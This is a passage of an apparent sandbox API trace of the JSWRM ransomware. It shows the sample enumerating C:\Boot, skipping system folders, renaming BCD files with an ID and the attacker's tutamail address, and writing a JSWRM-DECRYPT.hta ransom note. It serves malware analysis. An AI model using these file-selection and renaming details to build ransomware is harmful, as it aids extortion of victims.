lpOverlapped=0x0) returned 0 [0063.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.634] CloseHandle (hObject=0xffffffff) returned 1 [0063.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0063.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0063.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236db8 [0063.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0063.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236db8 | out: hHeap=0x1e0000) returned 1 [0063.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.635] MoveFileW (lpExistingFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), lpNewFileName="C:\\Boot\\BCD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\bcd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0063.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.635] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2=".") returned 1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2="..") returned 1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2="...") returned 1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2="windows") returned -1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2="recovery") returned -1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2="perflogs") returned -1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2="documents and settings") returned -1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2="$RECYCLE.BIN") returned 1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2="system volume information") returned -1 [0063.635] lstrcmpiW (lpString1="BCD.LOG", lpString2="msocache") returned -1 [0063.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0063.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG", cchWideChar=7, lpMultiByteStr=0x345f978, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD.LOG", lpUsedDefaultChar=0x0) returned 7 [0063.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0063.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG", cchWideChar=7, lpMultiByteStr=0x345f948, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD.LOG", lpUsedDefaultChar=0x0) returned 7 [0063.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.635] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0063.635] lstrcmpiW (lpString1="BCD.LOG1", lpString2=".") returned 1 [0063.635] lstrcmpiW (lpString1="BCD.LOG1", lpString2="..") returned 1 [0063.635] lstrcmpiW (lpString1="BCD.LOG1", lpString2="...") returned 1 [0063.635] lstrcmpiW (lpString1="BCD.LOG1", lpString2="windows") returned -1 [0063.635] lstrcmpiW (lpString1="BCD.LOG1", lpString2="recovery") returned -1 [0063.636] lstrcmpiW (lpString1="BCD.LOG1", lpString2="perflogs") returned -1 [0063.636] lstrcmpiW (lpString1="BCD.LOG1", lpString2="documents and settings") returned -1 [0063.636] lstrcmpiW (lpString1="BCD.LOG1", lpString2="$RECYCLE.BIN") returned 1 [0063.636] lstrcmpiW (lpString1="BCD.LOG1", lpString2="system volume information") returned -1 [0063.636] lstrcmpiW (lpString1="BCD.LOG1", lpString2="msocache") returned -1 [0063.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0063.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG1", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0063.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG1", cchWideChar=8, lpMultiByteStr=0x345f978, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD.LOG1", lpUsedDefaultChar=0x0) returned 8 [0063.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0063.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG1", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0063.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG1", cchWideChar=8, lpMultiByteStr=0x345f948, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD.LOG1", lpUsedDefaultChar=0x0) returned 8 [0063.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.636] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.636] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=0) returned 1 [0063.636] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1) returned 0x23b928 [0063.637] ReadFile (in: hFile=0x450, lpBuffer=0x23b928, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x23b928*, lpNumberOfBytesRead=0x345f63c*=0x0, lpOverlapped=0x0) returned 1 [0063.637] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.637] WriteFile (in: hFile=0x450, lpBuffer=0x23b928*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x23b928*, lpNumberOfBytesWritten=0x345f638*=0x0, lpOverlapped=0x0) returned 1 [0063.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b928 | out: hHeap=0x1e0000) returned 1 [0063.637] CloseHandle (hObject=0x450) returned 1 [0063.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0063.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0063.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373a8 [0063.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0063.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373a8 | out: hHeap=0x1e0000) returned 1 [0063.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217eb0 [0063.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0063.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.637] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\Boot\\BCD.LOG1.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\bcd.log1.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0063.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217eb0 | out: hHeap=0x1e0000) returned 1 [0063.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.638] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2=".") returned 1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2="..") returned 1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2="...") returned 1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2="windows") returned -1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2="recovery") returned -1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2="perflogs") returned -1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2="documents and settings") returned -1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2="$RECYCLE.BIN") returned 1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2="system volume information") returned -1 [0063.638] lstrcmpiW (lpString1="BCD.LOG2", lpString2="msocache") returned -1 [0063.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG2", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0063.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG2", cchWideChar=8, lpMultiByteStr=0x345f978, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD.LOG2", lpUsedDefaultChar=0x0) returned 8 [0063.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0063.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0063.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG2", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0063.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD.LOG2", cchWideChar=8, lpMultiByteStr=0x345f948, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD.LOG2", lpUsedDefaultChar=0x0) returned 8 [0063.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0063.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.639] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.639] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=0) returned 1 [0063.639] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1) returned 0x23ba48 [0063.639] ReadFile (in: hFile=0x450, lpBuffer=0x23ba48, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x23ba48*, lpNumberOfBytesRead=0x345f63c*=0x0, lpOverlapped=0x0) returned 1 [0063.639] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.639] WriteFile (in: hFile=0x450, lpBuffer=0x23ba48*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x23ba48*, lpNumberOfBytesWritten=0x345f638*=0x0, lpOverlapped=0x0) returned 1 [0063.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ba48 | out: hHeap=0x1e0000) returned 1 [0063.639] CloseHandle (hObject=0x450) returned 1 [0063.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0063.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0063.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237178 [0063.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0063.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237178 | out: hHeap=0x1e0000) returned 1 [0063.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0063.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0063.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.640] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\Boot\\BCD.LOG2.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\bcd.log2.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0063.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0063.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.640] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0063.640] lstrcmpiW (lpString1="bg-BG", lpString2=".") returned 1 [0063.640] lstrcmpiW (lpString1="bg-BG", lpString2="..") returned 1 [0063.640] lstrcmpiW (lpString1="bg-BG", lpString2="...") returned 1 [0063.640] lstrcmpiW (lpString1="bg-BG", lpString2="windows") returned -1 [0063.640] lstrcmpiW (lpString1="bg-BG", lpString2="recovery") returned -1 [0063.640] lstrcmpiW (lpString1="bg-BG", lpString2="perflogs") returned -1 [0063.640] lstrcmpiW (lpString1="bg-BG", lpString2="documents and settings") returned -1 [0063.640] lstrcmpiW (lpString1="bg-BG", lpString2="$RECYCLE.BIN") returned 1 [0063.641] lstrcmpiW (lpString1="bg-BG", lpString2="system volume information") returned -1 [0063.641] lstrcmpiW (lpString1="bg-BG", lpString2="msocache") returned -1 [0063.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0063.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0063.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237038 [0063.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.641] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\bg-bg\\jswrm-decrypt.hta")) returned 0xffffffff [0063.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237038 | out: hHeap=0x1e0000) returned 1 [0063.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2370d8 [0063.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.641] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\bg-bg\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.642] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.642] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.643] CloseHandle (hObject=0x450) 